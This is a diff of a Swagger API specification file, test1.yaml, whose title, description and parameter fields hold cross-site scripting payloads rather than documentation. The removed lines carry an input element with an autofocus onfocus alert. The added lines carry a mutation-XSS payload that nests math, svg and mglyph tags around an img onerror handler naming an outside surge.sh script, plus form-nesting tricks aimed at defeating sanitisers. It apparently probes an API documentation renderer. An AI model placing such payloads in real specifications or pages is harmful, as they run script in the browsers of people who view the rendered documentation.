--- a/test1.yaml
+++ b/test1.yaml
@@ -1,9 +1,9 @@
 swagger: '2.0'
 info:
-  title: Classic API Resource Documentation"><a
-  description: <hgroup><h2><pre><a><a target="<input type="text" id="search-text" name="query" value="alert(xsss1)" onfocus="alert(xsss1)" autofocus=xsss"></a></pre></h2></hgroup>
+  title: Classic API Resource Documentation"><hgroup>
+  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><details><a title='</textarea><img src onerror=alert(`https://exuberant-ice.surge.sh/script.js`)>'></details></h1>">"</details></desc></details></mtext></mtext></svg></mglyph></hgroup></mtext></math>
 version: production
-basePath: /JSSResource/"</a>
+basePath: /JSSResource/
 produces:
   - application/xml
   - application/json
@@ -26,7 +26,7 @@ paths:
     delete:
       parameters:
         - description: |
-            <form><math><mtext></form><form><mglyph><svg><mtext></form>
+            <form><math><mtext></form><form><mglyph><svg><mtext></form><hgroup>
 
           format: int64
           in: path
